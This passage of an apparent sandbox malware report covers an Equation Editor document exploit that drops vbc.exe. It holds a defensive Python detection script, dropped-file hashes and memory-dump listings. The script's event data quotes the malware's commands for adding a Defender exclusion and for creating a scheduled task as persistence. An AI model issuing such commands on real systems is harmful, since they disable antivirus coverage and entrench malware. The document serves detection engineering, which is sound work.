        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
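Three things in the tree above matter for detection engineering. First, EQNEDT32.EXE is a top-level process started by DCOM (note the -Embedding switch), so a rule keyed on WINWORD.EXE as its parent will not fire; the reliable signal is Equation Editor having any child at all. Second, the 32-bit vbc.exe asks for C:\Windows\System32\powershell.exe and schtasks.exe but WOW64 redirection runs the SysWOW64 copies, so image path and command line disagree, which is normal for a 32-bit parent but worth knowing before writing path matches. Third, the Defender exclusion and the scheduled task both reference gmRCHGfmw while the Run key written by the hollowed child PID 1316 (the SetThreadContext target) references gcWPrHZ, so a hunt needs both names. The added example below (written for this page, not vendor code) encodes those observations as rules over process-creation events constructed from the tree; parent PIDs for the two level-1 processes are unknown and set to 0.

```python
import re

# Process-creation events constructed from the process tree in this report.
# ppid 0 marks a parent the report does not show (WINWORD.EXE and the
# DCOM-launched EQNEDT32.EXE are level-1 processes, not parent/child).
EVENTS = [
    {"pid": 1248, "ppid": 0, "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"'},
    {"pid": 900, "ppid": 0, "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 1488, "ppid": 900, "image": r"C:\Users\Public\vbc.exe", "cmdline": r'"C:\Users\Public\vbc.exe"'},
    {"pid": 1936, "ppid": 1488, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gmRCHGfmw.exe"'},
    {"pid": 1580, "ppid": 1488, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gmRCHGfmw" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1A17.tmp"'},
    {"pid": 568, "ppid": 1488, "image": r"C:\Users\Public\vbc.exe", "cmdline": r'"C:\Users\Public\vbc.exe"'},
    {"pid": 1316, "ppid": 1488, "image": r"C:\Users\Public\vbc.exe", "cmdline": r'"C:\Users\Public\vbc.exe"'},
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule) pairs. Rules are deliberately keyed on the behaviours
    that survive renaming the payload: who spawned it, what it asked the OS to do,
    and where it ran from."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name, cmd = image_name(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        # Equation Editor never legitimately spawns children; parent is DCOM, not Word.
        if parent and image_name(parent["image"]) == "eqnedt32.exe":
            hits.append((e["pid"], "equation_editor_child"))
        # Defender exclusions added from the command line (Add-MpPreference -Exclusion*).
        if name == "powershell.exe" and re.search(r"add-mppreference\b.*-exclusion", cmd, re.I):
            hits.append((e["pid"], "defender_exclusion"))
        # Scheduled task created from an XML definition dropped in a Temp directory.
        if name == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) \
                and re.search(r'/xml\s+"?[^"]*\\temp\\', cmd, re.I):
            hits.append((e["pid"], "schtasks_xml_from_temp"))
        # Execution out of the world-writable C:\Users\Public tree.
        if e["image"].lower().startswith("c:\\users\\public\\"):
            hits.append((e["pid"], "exec_from_users_public"))
        # A binary named like the .NET VB compiler that is not under the framework directory.
        if name == "vbc.exe" and not e["image"].lower().startswith("c:\\windows\\microsoft.net\\"):
            hits.append((e["pid"], "vbc_name_outside_dotnet_dir"))
    return hits


def wow64_redirected(events):
    """PIDs whose command line names System32 but whose image resolved under SysWOW64:
    informational, it tells you the parent is 32-bit."""
    return [e["pid"] for e in events
            if "\\system32\\" in e["cmdline"].lower() and "\\syswow64\\" in e["image"].lower()]


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
    print("WOW64-redirected children:", wow64_redirected(EVENTS))
```

The same rules translate directly into Sigma or EDR query syntax; the point of running them over the tree first is to confirm each one actually fires on this sample before it is deployed.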
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
Filesize  128KB
MD5       052f9ec24e05d1d4e02e06b4dd9507f4
SHA1      f3622165331f541f14abbbdba5a360f591318ef9
SHA256    2984965f02436f5c9ce74e08c26d8e4bdbf978ddc4fd1ecbca7f6c56d3c72b34
SHA512    8e65290c2b7553ab86e413d225aab4bd0b61108a00b29c0456898ff7fd21d598e50bbbce108bd2b31f6fda9042665f81e54c075f70e3124f01955e4ef53ca147
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FC43B91B-5F3D-4FCC-A693-00FFE98FFBDD}.FSD
Filesize  128KB
MD5       8126e47d5e2f24324bbc8227b671d04a
SHA1      5a68a48b8066e17be9d4f37dbd7f438ac50c32cd
SHA256    92489ef7b9e580ab62234b941ad7b05013013904e316d1b7effdf595e8bf24ef
SHA512    e0475dd0721a69d48e276f4fa8b8e5cf01c7c0c982b5771e2e74426c941eaf9c3ac59be55a11d69d8f206066b5cf323b254c1061de7cc4f4f15440a8f3e36a70
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize  128KB
MD5       a0859b3ca3a5c07878c1bc3dd9221437
SHA1      56fb90b51bef7bf198777708a52904c254754b5d
SHA256    ffb70ef528dd1e05e48033ccb9d69e6920e5fdf85acca9b8086ba3e64a2e930b
SHA512    672cad2c7e4cdbe1b226f0ef22b3acfd22fb9ad0771591eb8d8149ec02ee6a595fc6e43f6878f1a19e043dbc41ade508655def18dcf2b3a1313e595210c9dc6e
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize  128KB
MD5       741ebcf2dccd2bbf834b01caff073b11
SHA1      0df0bff6114d7b504dc413affddbf971333a8b16
SHA256    c84c4a14b6ed5d1d5f9bfaa4465a3d52553084353a934858ab327939f5e34438
SHA512    cce86daa9608e67a2eff459544d75b09e6cf603d95f85b4c102c9c8fc59f566f0c2d27874baefef20bd63b193b4767bbbeb74d73a4fb5e9f51da502daace4fd5
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DC4C6444-BCB1-4DE8-A572-11D93416C241}.FSD
Filesize  128KB
MD5       f0ba8f1b90d6fded12baadee98f4cb99
SHA1      66ffcd9002cf8bf6ab98baf93321053e5e8a0cab
SHA256    e7d6c56cd71ae0f6d9ab50258ccd3c2ca2b5b0432c4b3fa7f5befbf592544ef1
SHA512    aba3db56ca2443160a67f1881114cf119543a543ed6c2e54051da2da1da0da6efbd370b0389dc8f35cbd724bc6d7de06a8c6700274bf640f80b64bad38f27d45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QCNSQOTT\rr[1].doc
Filesize  12KB
MD5       dbca576eca2dd4201a06f467ada3d524
SHA1      489ea5b066263a10ca81db28eed66545c6d2d4b2
SHA256    d90badc8f1680f191a5822f37582cc2e8ed39d044627c071812ad947b8a0a90f
SHA512    e48edabcbc2bc1f6d7ad91ffa5cd91e06c77ae7d4b074fb7eb15b20e8afe1f39229cb1be7921b18e3fb94f8c30e20ba61a22d46eafeb70229aa52722d99d7b2d
-
C:\Users\Admin\AppData\Local\Temp\tmp1A17.tmp
Filesize  1KB
MD5       2dfe08f3ee47da656ba22385a6e085f7
SHA1      79c438e0a645fa7bf714a59b6f419e46af637d5f
SHA256    8c557bfebc17cb768e3ddff8e2519ba5ebbdbb821973a08f06ab1538013b4cfd
SHA512    96380a7f2ba15bb2cca589baed2a36f129868bc37a3d887eadbf02459f2f1d3c05c1c3ebaf1b3b5f9343d0045f1c7cc0fa7d0a92210863b251db4f50530c74e9
-
C:\Users\Admin\AppData\Local\Temp\{5C9D101B-BDBE-4CD7-8920-1435D9A7B6C4}
Filesize  128KB
MD5       f2d7d7559ef3b630eee4ad9b2220d255
SHA1      f9e8fb2699cd5f51f10188d530d3cc527151d1a1
SHA256    912cdbf8789f99ba1d324127f130b02a3cf938d6cc0c3ecf3440fb94b52858e2
SHA512    b215351a7c2a0e4de376730e3ef26f7aafbbc5493e83de7b35fdf052d6882fb1f5c95eb4d469bcdaff395ed551156f25656eac1d11e36e73d955dfb64ea23407
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Filesize  105B
MD5       ef5c93397775c0240daba47626ee0b22
SHA1      e64cb17cb9e1af3a3d7689f786436873005c2a12
SHA256    fc0ea4509f1e1c815f59e36b6d991d21e4aaf220b17985f27b8cd566d9e8b9d7
SHA512    8bbd258c2696f41fdf4367adfbde9b96583479c7ab3d0c516edd3b4ecea4dcdbabdbacb85dd5264609f374b6f9ed38d47bd5c351e30bac8ee9f0757feee022fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize  20KB
MD5       d91bf19fdabe71bac54559f2ffd9a0dd
SHA1      a13e7ab25ae6df36ef64faebc718a758864d2f9a
SHA256    7460ae6d2231ecda0b194508308e757a375af4da5ce4e979645a7764fa680dc4
SHA512    630a1b0955d9edded5b0393a2e2296280f7e115e7175cf1b56882fe1b787c74f4c9516927d3028784f5435db193c09e9716cf940e4b0c9a2b380f0696cb22e3b
-
C:\Users\Public\vbc.exe  (5 identical entries)
Filesize  977KB
MD5       0bbeb58e735d6bd4d0d30f150c36a15e
SHA1      8f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256    efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512    ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
\Users\Public\vbc.exe  (2 identical entries)
Filesize  977KB
MD5       0bbeb58e735d6bd4d0d30f150c36a15e
SHA1      8f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256    efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512    ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
memory/1248-207-0x000000005FFF0000-0x0000000060000000-memory.dmp
Filesize  64KB
-
memory/1248-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
Filesize  64KB
-
memory/1316-169-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-171-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-179-0x0000000000440000-0x0000000000480000-memory.dmp
Filesize  256KB
-
memory/1316-176-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-174-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-166-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-167-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-168-0x0000000000400000-0x0000000000430000-memory.dmp
Filesize  192KB
-
memory/1316-170-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
Filesize  4KB
-
memory/1488-155-0x0000000007F30000-0x0000000007FDA000-memory.dmp
Filesize  680KB
-
memory/1488-153-0x0000000004E00000-0x0000000004E40000-memory.dmp
Filesize  256KB
-
memory/1488-152-0x0000000000620000-0x000000000063A000-memory.dmp
Filesize  104KB
-
memory/1488-154-0x00000000005C0000-0x00000000005CC000-memory.dmp
Filesize  48KB
-
memory/1488-162-0x00000000012F0000-0x0000000001322000-memory.dmp
Filesize  200KB
-
memory/1488-161-0x0000000000D80000-0x0000000000D86000-memory.dmp
Filesize  24KB
-
memory/1488-146-0x0000000004E00000-0x0000000004E40000-memory.dmp
Filesize  256KB
-
memory/1488-145-0x0000000001320000-0x000000000141A000-memory.dmp
Filesize  1000KB
-
memory/1936-177-0x0000000000490000-0x00000000004D0000-memory.dmp
Filesize  256KB
-
memory/1936-178-0x0000000000490000-0x00000000004D0000-memory.dmp
Filesize  256KB